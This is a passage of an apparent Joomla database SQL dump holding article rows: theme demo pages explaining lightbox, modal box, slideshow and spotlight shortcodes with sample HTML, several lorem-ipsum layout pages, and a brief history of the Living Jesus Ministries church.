icon=\"icon-check\"]<a data-lightbox=\"group:media\" href=\"http://vimeo.com/24535181\" title=\"Vimeo Video\">Vimeo</a>[/li]\r\n[li icon=\"icon-check\"]<a data-lightbox=\"group:media;autoplay:true;\" href=\"http://demo.arrowthemes.com/video/envato_sting.mp4\" title=\"MP4 (h.264)\">MP4 (h.264)</a>[/li]\r\n[li icon=\"icon-check\"]<a data-lightbox=\"group:media\" href=\"http://www.adobe.com/jp/events/cs3_web_edition_tour/swfs/perform.swf?width=500&amp;height=420\" title=\"Flash Swf\">Swf</a>[/li]\r\n[li icon=\"icon-check\"]<a data-lightbox=\"group:media\" href=\"#inline\" title=\"Inline Content from the Website\">Inline</a>[/li]\r\n[li icon=\"icon-check\"]<a data-lightbox=\"group:media;width:1000;height:600\" href=\"http://www.wikipedia.org\" title=\"Iframe\">Iframe</a>[/li]\r\n[/list]\r\n<div style=\"display: none;\">\r\n<div id=\"inline\" style=\"width: 400px; height: 300px; overflow: auto;\">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</div>\r\n</div>\r\n\r\n[heading size=\"h3\" style=\"module-title uk-margin-top\"]Load Widgets In A Lightbox[/heading]\r\n\r\n<p>Use <code>#wk-ID</code> to load widgets like slideshows or galleries in a lightbox. For example: <a data-lightbox=\"width:640;height:425;\" href=\"#wk-2\">Widgetkit Slideshow</a></p>\r\n<pre>&lt;a data-lightbox=\"width:945;height:637;\" href=\"#wk-2\"&gt;Lightbox&lt;/a&gt;</pre>\r\n\r\n[heading size=\"h3\" style=\"module-title uk-margin-top\"]How to use[/heading]\r\n\r\n<p>Use the HTML5 custom data attribute <code>data-lightbox</code> to activate the lightbox. You can set various lightbox parameters to the data attribute. For example:</p>\r\n\r\n\r\n<pre><code>&lt;a data-lightbox=\"width:1000;height:600;\" href=\"http://www.wikipedia.org\"&gt;Lightbox&lt;/a&gt;</code></pre>\r\n<p>Here is a list of the most common parameters:</p>\r\n[list style=\"list-icons\"]\r\n[li icon=\"icon-check\"]<strong>titlePosition</strong> - How should the title show up? (<code>float</code>, <code>outside</code>, <code>inside</code> or <code>over</code>)[/li]\r\n[li icon=\"icon-check\"]<strong>transitionIn</strong> - Set a opening transition. (<code>fade</code>, <code>elastic</code>, or <code>none</code>)[/li]\r\n[li icon=\"icon-check\"]<strong>transitionOut</strong> - Set a closing transition (<code>fade</code>, <code>elastic</code>, or <code>none</code>)[/li]\r\n[li icon=\"icon-check\"]<strong>overlayShow</strong> - Set to <code>true</code> or <code>false</code>[/li]\r\n[li icon=\"icon-check\"]<strong>scrolling</strong> - Set to <code>yes</code> or <code>no</code>[/li]\r\n[li icon=\"icon-check\"]<strong>width</strong> - Set a width in pixel[/li]\r\n[li icon=\"icon-check\"]<strong>height</strong> - Set a height in pixel[/li]\r\n[li icon=\"icon-check\"]<strong>padding</strong> - Set a padding in pixel[/li]\r\n[/list]\r\n\r\n<h2 class=\"dotted\"><strong>Reveal</strong> Lightbox</h2>\r\n<p>Use the <code>[modal_box]</code> shortcode to show a popup box with overlay. The <code>[modal_box]</code> shortcode can also be linked with these module positions: <code>reveal-a</code>, <code>reveal-b</code> and <code>reveal-c</code>. By using one of these positions as your <code>target</code>, the modal box will show a popup of the modules that have be placed in these positions and assigned to the corresponding menu.</p>\r\n      <table class=\"uk-table uk-table-hover uk-table-condensed\">\r\n        <thead>\r\n          <tr>\r\n            <th class=\"uk-width-1-4\">target</th>\r\n            <th class=\"uk-width-3-4\">Description</th>\r\n          </tr>\r\n        </thead>\r\n        <tbody>\r\n          <tr>\r\n            <td><code>reveal-a</code></td>\r\n            <td>show modal box for modules in reveal-a position</td>\r\n          </tr>\r\n          <tr>\r\n            <td><code>reveal-b</code></td>\r\n            <td>show modal box for modules in reveal-b position</td>\r\n          </tr>\r\n          <tr>\r\n            <td><code>reveal-c</code></td>\r\n            <td>show modal box for modules in reveal-c position</td>\r\n          </tr>\r\n        \r\n          </tbody>\r\n          </table>\r\n\r\n          <p>For each module linked to <code>reveal-a</code>, <code>reveal-b</code> or <code>reveal-c</code>, you can use Module Class Suffix to style it just like a normal module. The <code>target</code> parameter can also be the id of a content section.</p>\r\n\r\n          [heading size=\"h3\" style=\"module-title dotted\"]Size modifier[/heading]\r\n          <p>To adjust the size (width) of the modal box, add <code>modal-small</code> or <code>modal-large</code> to the Module Class Suffix of the module.</p> \r\n\r\n          [heading size=\"h3\" style=\"module-title dotted\"]Trigger a modal box from link[/heading]<br/>\r\n          [modal_box link target=\"reveal-a\"]reveal-a[/modal_box]&nbsp;&nbsp;&nbsp;[modal_box link target=\"reveal-b\"]reveal-b[/modal_box]&nbsp;&nbsp;&nbsp;[modal_box link target=\"reveal-c\"]reveal-c[/modal_box] \r\n          <br/>\r\n\r\n          [badge style=\"note uk-margin-top\"]markup[/badge]\r\n          <pre><i>[</i>modal_box link target=\"reveal-a\"]reveal-a<i>[</i>/modal_box] \r\n<i>[</i>modal_box link target=\"reveal-b\"]reveal-b<i>[</i>/modal_box] \r\n<i>[</i>modal_box link target=\"reveal-c\"]reveal-c<i>[</i>/modal_box]</pre>\r\n\r\n          [heading size=\"h3\" style=\"module-title\"]Toggle modal box from buttons[/heading]<br/>\r\n          [modal_box button style=\"color\" target=\"reveal-a\"]reveal-a[/modal_box]&nbsp;&nbsp;&nbsp;[modal_box button style=\"color\" target=\"reveal-b\"]reveal-b[/modal_box]&nbsp;&nbsp;&nbsp;[modal_box button style=\"color\" target=\"reveal-c\"]reveal-c[/modal_box]<br/><br/>\r\n\r\n          [badge style=\"note uk-margin-top\"]markup[/badge]\r\n          <pre><i>[</i>modal_box button style=\"color\" target=\"reveal-a\"]reveal-a<i>[</i>/modal_box]\r\n<i>[</i>modal_box button style=\"color\" target=\"reveal-b\"]reveal-b<i>[</i>/modal_box]\r\n<i>[</i>modal_box button style=\"color\" target=\"reveal-c\"]reveal-c<i>[</i>/modal_box]</pre><br/>\r\n\r\n\r\n          [heading size=\"h3\" style=\"module-title\"]Toggle modal box for inline content[/heading]<br/>\r\n          <p>The <code>[modal_box]</code> shortcode can also be used for inline content by using the following sytnax:</p>\r\n          \r\n          [badge style=\"note uk-margin-top\"]markup[/badge]\r\n          <pre>&lt;!-- create a link that will trigger the pop-up modal box --&gt;\r\n<i>[</i>modal_box link target=\"mycontent\"]my link<i>[</i>/modal_box] \r\n\r\n&lt;!-- create the content of the modal box --&gt;\r\n<i>[</i>modal_box content target=\"mycontent\" style=\"mod-color\"]\r\n...\r\n<i>[</i>/modal_box]</pre><br/>\r\n\r\n          [modal_box button style=\"color\" target=\"mycontent\"]Popup content[/modal_box]\r\n\r\n          [modal_box content target=\"mycontent\" style=\"mod-color\"]\r\n          [heading size=\"h3\" style=\"module-title\"]Inline content[/heading]\r\n              <p>Throughout life people will make you mad, disrespect you and treat you bad. Let God deal with the things they do, cause hate in your heart will consume you too. Be kind whenever possible. It is always possible.</p><br/>\r\n\r\n          [/modal_box]<br/>\r\n\r\n\r\n<hr class=\"system-pagebreak\" title=\"Image Slideshow\"  alt=\"Image Slideshow\" />\r\n<p>The Widgetkit Slideshow is the ultimate image and content slideshow for Joomla and WordPress. It\'s flexible, easy to customize and completely build with HTML5 and CSS3.</p>\r\n\r\n[heading size=\"h3\" style=\"module-title uk-margin-top\"]Features[/heading]\r\n\r\n[list style=\"list-icons\"]\r\n[li icon=\"icon-check\"]Clean and very lightweight code[/li]\r\n[li icon=\"icon-check\"]17 eye-catching transition effects[/li]\r\n[li icon=\"icon-check\"]Uses hardware accelerated CSS3 animations[/li]\r\n[li icon=\"icon-check\"]JavaScript animation fallback for all Internet Explorers[/li]\r\n[li icon=\"icon-check\"]Support for HTML captions[/li]\r\n[li icon=\"icon-check\"]Swipe navigation on mobile phones[/li]\r\n[li icon=\"icon-check\"]Built with HTML5, CSS3, PHP 5.2+, and the latest jQuery version[/li]\r\n[li icon=\"icon-check\"]Works with Joomla and WordPress[/li]\r\n[/list]\r\n\r\n[heading size=\"h3\" style=\"module-title uk-margin-top\"]Slideshow Example[/heading]\r\n<p>This is an image slideshow with eye-catching transition effects.</p>\r\n<p>[widgetkit id=4]</p>\r\n<p></p>\r\n\r\n[heading size=\"h3\" style=\"module-title uk-margin-top\"]How to use[/heading]\r\n<p>The Widgetkit Slideshow takes full advantage of the very user-friendly Widgetkit administration user interface. It has never been easier to create and manage all the slideshows and their different slides in one place. After you created a slideshow you can load it anywhere in your theme using shortcodes or the universal Widgetkit Joomla module or WordPress widget.</p>\r\n<hr class=\"system-pagebreak\" title=\"Image Spotlight\"  alt=\"Image Spotlight\" />\r\n<p>The Widgetkit Spotlight allows you to add an overlay to your images which fades or moves in on mouse hover. The overlay can be an image or HTML content. The default magnifier spotlight is a perfect match to be used with a lightbox.</p>\r\n<h2>Features</h2>\r\n[list style=\"list-icons\"]\r\n[li icon=\"icon-check\"]Create nicely animated image overlays[/li]\r\n[li icon=\"icon-check\"]Supports custom image or HTML content overlays[/li]\r\n[li icon=\"icon-check\"]5 different animation modes[/li]\r\n[li icon=\"icon-check\"]Build on the latest jQuery version[/li]\r\n[li icon=\"icon-check\"]Works with Joomla and WordPress[/li]\r\n[/list]\r\n\r\n[heading size=\"h3\" style=\"module-title uk-margin-top\"]Examples[/heading]\r\n\r\n<p>If no custom overlay is set the default spotlight fades in an overlay with an magnifier image. If you define a custom overlay you can choose between different animations - <code>fade</code>, <code>bottom</code>, <code>top</code>, <code>right</code> and <code>left</code>.</p>\r\n<p> </p>\r\n<p>[grid][column size=\"1-3\"]<a data-lightbox=\"transitionIn:fade;transitionOut:fade;\" href=\"images/demo/sample_big.jpg\" data-spotlight=\"on\"><img src=\"images/demo/sample.jpg\" alt=\"fade\" width=\"250\" height=\"250\" /></a>[/column]</p>\r\n<p>[column size=\"1-3\"]<a data-lightbox=\"transitionIn:elastic;transitionOut:elastic;\" href=\"images/demo/sample_big.jpg\" data-spotlight=\"effect:bottom;\"><img src=\"images/demo/sample.jpg\" alt=\"fade\" title=\"Custom Overlay (Bottom)\" width=\"250\" height=\"250\" /><span class=\"overlay\">Custom Overlay (Bottom)</span></a>[/column]</p>\r\n<p>[column size=\"1-3\"]<a data-lightbox=\"transitionIn:none;transitionOut:none;\" href=\"images/demo/sample_big.jpg\" data-spotlight=\"effect:right;\"><img src=\"images/demo/sample.jpg\" alt=\"fade\" width=\"250\" height=\"250\" /><span class=\"overlay\">Custom Overlay (Right)</span></a></p>\r\n<p><a data-lightbox=\"transitionIn:none;transitionOut:none;\" href=\"images/demo/sample_big.jpg\" data-spotlight=\"effect:right;\"></a>[/column][/grid]</p>\r\n<p>[grid][column size=\"1-3\"]<a data-lightbox=\"transitionIn:elastic;transitionOut:elastic;titlePosition:float;\" href=\"images/demo/sample_big.jpg\" title=\"Lorem Ipsum is simply dummy text of the printing and typesetting industry\" data-spotlight=\"effect:fade;\"><img src=\"images/demo/sample.jpg\" alt=\"fade\" width=\"250\" height=\"250\" /></a>[/column]</p>\r\n<p>[column size=\"1-3\"]<a data-lightbox=\"transitionIn:elastic;transitionOut:elastic;titlePosition:inside\" href=\"images/demo/sample_big.jpg\" title=\"Lorem Ipsum is simply dummy text of the printing and typesetting industry\" data-spotlight=\"effect:top;\"><img src=\"images/demo/sample.jpg\" alt=\"fade\" width=\"250\" height=\"250\" /><span class=\"overlay\">Custom Overlay (Top)</span></a>[/column]</p>\r\n<p>[column size=\"1-3\"]<a data-lightbox=\"transitionIn:elastic;transitionOut:elastic;titlePosition:over\" href=\"images/demo/sample_big.jpg\" title=\"Lorem Ipsum is simply dummy text of the printing and typesetting industry\" data-spotlight=\"effect:left;\"><img src=\"images/demo/sample.jpg\" alt=\"fade\" width=\"250\" height=\"250\" /><span class=\"overlay\">Custom Overlay (Left)</span></a>[/column][/grid]</p>\r\n\r\n[heading size=\"h3\" style=\"module-title uk-margin-top\"]How to use[/heading]\r\n<p>Use the HTML5 custom data attribute <code>data-spotlight</code> to activate the spotlight.</p>\r\n<pre>&lt;a data-spotlight=\"on\" href=\"/mypage.html\"&gt;\r\n  &lt;img src=\"/image.jpg\" width=\"180\" height=\"120\" alt=\"\" /&gt;\r\n&lt;/a&gt;</pre>\r\n<p>To create a custom overlay use a div element with the CSS class <code>overlay</code>. You can set the effect parameter to the data attribute. For example:</p>\r\n<pre>&lt;a data-spotlight=\"effect:bottom;\" href=\"/mypage.html\"&gt;\r\n  &lt;img src=\"/image.jpg\" width=\"180\" height=\"120\" alt=\"\" /&gt;\r\n  &lt;span class=\"overlay\"&gt;Custom Overlay&lt;/span&gt;\r\n&lt;/a&gt;</pre>\r\n<p>You can set the effect parameter to <code>fade</code>, <code>bottom</code>, <code>top</code>, <code>right</code> and <code>left</code>.</p>', '', 1, 2, '2014-07-25 11:15:00', 196, '', '2015-06-23 07:15:40', 42, 0, '0000-00-00 00:00:00', '2014-07-25 11:15:00', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 48, 16, '', '', 1, 3507, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(23, 75, 'Full Width', 'full-width', '<p class=\"dropcap\">Mauris at lectus ut purus facilisis volutpat. Aliquam nec turpis in nunc venenatis aliquam at ut enim. Etiam sed odio vitae dolor feugiat cursus pulvinar quis nisi. Sed consectetur eleifend tempus. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus vitae dolor feugiat cursus pulvinar quis nisi. Sed consectetur eleifend tempus. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus</p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec sit amet nibh. Vivamus non arcu. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam dapibus, tellus ac ornare aliquam, massa diam tristique urna, id faucibus lectus erat ut pede. Maecenas varius neque nec libero laoreet faucibus. Phasellus sodales, lectus sed vulputate rutrum, ipsum nulla lacinia magna, sed imperdiet ligula nisi eu ipsum. Donec nunc magna, posuere eget, aliquam in, vulputate in, lacus. Sed venenatis. Donec nec dolor vitae mauris dapibus ullamcorper. Etiam iaculis mollis tortor.</p>\r\n<p>lacinia magna orem ipsum dolor sit amet, consectetur adipiscing elit. Donec sit amet nibh. Vivamus non arcu. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam dapibus, tellus ac ornare aliquam, massa diam tristique urna, id faucibus lectus erat ut pede. Maecenas varius neque nec libero laoreet faucibus. Phasellus sodales, lectus sed vulputate rutrum, ipsum nulla lacinia magna, sed imperdiet ligula nisi eu ipsum. Donec nunc magna, posuere eget, aliquam in, vulputate in, lacus. Sed venenatis. Donec nec dolor vitae mauris dapibus ullamcorper. Etiam iaculis mollis tortor.</p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>', '', 1, 19, '2012-03-30 13:19:35', 196, '', '0000-00-00 00:00:00', 0, 0, '0000-00-00 00:00:00', '2012-03-30 13:19:35', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 1, 6, '', '', 1, 507, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(24, 76, 'Content + Right', 'content-right', '<p class=\"dropcap\">Mauris at lectus ut purus facilisis volutpat. Aliquam nec turpis in nunc venenatis aliquam at ut enim. Etiam sed odio vitae dolor feugiat cursus pulvinar quis nisi. Sed consectetur eleifend tempus. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus vitae dolor feugiat cursus pulvinar quis nisi. Sed consectetur eleifend tempus. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus</p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec sit amet nibh. Vivamus non arcu. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam dapibus, tellus ac ornare aliquam, massa diam tristique urna, id faucibus lectus erat ut pede. Maecenas varius neque nec libero laoreet faucibus. Phasellus sodales, lectus sed vulputate rutrum, ipsum nulla lacinia magna, sed imperdiet ligula nisi eu ipsum. Donec nunc magna, posuere eget, aliquam in, vulputate in, lacus. Sed venenatis. Donec nec dolor vitae mauris dapibus ullamcorper. Etiam iaculis mollis tortor.</p>\r\n<p>lacinia magna orem ipsum dolor sit amet, consectetur adipiscing elit. Donec sit amet nibh. Vivamus non arcu. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam dapibus, tellus ac ornare aliquam, massa diam tristique urna, id faucibus lectus erat ut pede. Maecenas varius neque nec libero laoreet faucibus. Phasellus sodales, lectus sed vulputate rutrum, ipsum nulla lacinia magna, sed imperdiet ligula nisi eu ipsum. Donec nunc magna, posuere eget, aliquam in, vulputate in, lacus. Sed venenatis.</p>', '', 1, 19, '2012-03-30 13:21:45', 196, '', '2012-03-30 13:28:24', 42, 0, '0000-00-00 00:00:00', '2012-03-30 13:21:45', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 2, 5, '', '', 1, 1296, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(25, 77, 'Left + Content', 'left-content', '<p class=\"dropcap\">Mauris at lectus ut purus facilisis volutpat. Aliquam nec turpis in nunc venenatis aliquam at ut enim. Etiam sed odio vitae dolor feugiat cursus pulvinar quis nisi. Sed consectetur eleifend tempus. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus vitae dolor feugiat cursus pulvinar quis nisi. Sed consectetur eleifend tempus. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus</p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec sit amet nibh. Vivamus non arcu. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam dapibus, tellus ac ornare aliquam, massa diam tristique urna, id faucibus lectus erat ut pede. Maecenas varius neque nec libero laoreet faucibus. Phasellus sodales, lectus sed vulputate rutrum, ipsum nulla lacinia magna, sed imperdiet ligula nisi eu ipsum. Donec nunc magna, posuere eget, aliquam in, vulputate in, lacus. Sed venenatis. Donec nec dolor vitae mauris dapibus ullamcorper. Etiam iaculis mollis tortor.</p>\r\n<p>lacinia magna orem ipsum dolor sit amet, consectetur adipiscing elit. Donec sit amet nibh. Vivamus non arcu. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam dapibus, tellus ac ornare aliquam, massa diam tristique urna, id faucibus lectus erat ut pede. Maecenas varius neque nec libero laoreet faucibus. Phasellus sodales, lectus sed vulputate rutrum, ipsum nulla lacinia magna, sed imperdiet ligula nisi eu ipsum. Donec nunc magna, posuere eget, aliquam in, vulputate in, lacus. Sed venenatis.</p>', '', 1, 19, '2012-03-30 13:22:13', 196, '', '2012-03-30 13:34:52', 42, 0, '0000-00-00 00:00:00', '2012-03-30 13:22:13', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 4, 2, '', '', 1, 731, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(26, 78, 'Left + Content + Right', 'left-content-right', '<p class=\"dropcap\">Mauris at lectus ut purus facilisis volutpat. Aliquam nec turpis in nunc venenatis aliquam at ut enim. Etiam sed odio vitae dolor feugiat cursus pulvinar quis nisi. Sed consectetur eleifend tempus. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus vitae dolor feugiat cursus pulvinar quis nisi. Sed consectetur eleifend tempus. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus</p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec sit amet nibh. Vivamus non arcu. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam dapibus, tellus ac ornare aliquam, massa diam tristique urna, id faucibus lectus erat ut pede. Maecenas varius neque nec libero laoreet faucibus. Phasellus sodales, lectus sed vulputate rutrum, ipsum nulla lacinia magna, sed imperdiet ligula nisi eu ipsum. Donec nunc magna, posuere eget, aliquam in, vulputate in, lacus. Sed venenatis. Donec nec dolor vitae mauris dapibus ullamcorper. Etiam iaculis mollis tortor.</p>', '', 1, 19, '2012-03-30 13:23:03', 196, '', '2012-03-30 13:35:03', 42, 0, '0000-00-00 00:00:00', '2012-03-30 13:23:03', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 3, 3, '', '', 1, 760, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(27, 79, 'The Church', 'brief-history', '<p><img class=\"pic3d uk-align-right\" src=\"images/church.png\" alt=\"Joomla\" /></p>\r\n<p class=\"dropcap\">The LIVING JESUS MINISTRIES is a ministry directed at the building up of the body of Christ worldwide. In 1984, God commissioned His servant, Rev. Olusola Areogun to go and show the world that Jesus is alive and teach believers how to operate in the life of God in them. The ministry started as a missionary organization in 1984, reaching out to villages and planting churches ( then called Redemption Faith Churches) in stack virgin lands. This became a great opportunity for a lot of youths to train for ministry.</p>\r\n<p class=\"dropcap\">In 1988, God spoke to His servant to conduct city-wide special healing services in different towns where believers were taught on victory over sin, sickness and poverty. In 1990, he began to hold Believers Bible Conference in major cities in Nigeria , where various churches come together to receive light from God’s word. Ministers’ sessions were highly attended by various ministers of the Gospel. This lasted for about six years. When the church arm took off in 1989, November, God told him to raise people as an oasis of life and power of God in their world.</p>\r\n<p class=\"dropcap\">Further still in 1996, he was taken in a vision, where he stood before the Lord with other servants of God in this country where each person was being assigned for destiny appointments to their generation. When it was his turn to pick from a basket, he stepped out and picked a paper with this bold inscription “COMMITTED TO HELPING MEN REALIZE THEIR GOD-GIVEN DREAMS IN LIFE!” Starting from Ilesa and going forth to touch the globe, God is working through His servant to create platforms for multitudes (sons and daughters in the house) for their destinies.</p>', '', 1, 20, '2012-03-30 13:37:01', 196, '', '2017-05-03 00:07:38', 196, 0, '0000-00-00 00:00:00', '2012-03-30 13:37:01', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 49, 4, '', '', 1, 11659, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
